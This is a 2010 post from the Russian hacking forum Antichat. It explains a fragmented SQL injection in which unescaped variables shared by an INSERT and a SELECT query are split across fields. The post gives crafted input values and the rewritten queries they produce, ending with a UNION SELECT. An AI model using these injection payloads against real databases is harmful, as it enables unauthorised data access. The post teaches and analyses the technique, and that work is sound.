Показать сообщение отдельно

  #2  
Старый 01.02.2010, 17:52
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

если внимательно присмотрется в оба запроса, можно заметить, что в инсерте участвует на 1 переменную больше, что дает нам возможность реализовать фрагментированную sqli
было:
Цитата:
insert into DBinfo (user, text1, text2, text3 ) values ('$USER','$text1','$text2', '$text3')
Цитата:
select id from DBinfo where user='$USER' and text1='$text1' and text3='$text3'
задали:
$USER='or
$text1=or
$text2=,1,1,1)/*
$text3=union select xek/*
стало:
Цитата:
insert into DBinfo (user, text1, text2, text3 ) values (''or','or',',1,1,1)/*','union select xek/*')
Цитата:
select id from DBinfo where user=''or' and text1='or' and text3='union select xek/*'
и желательно в дальнейшем постить такие вопросы сюда
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..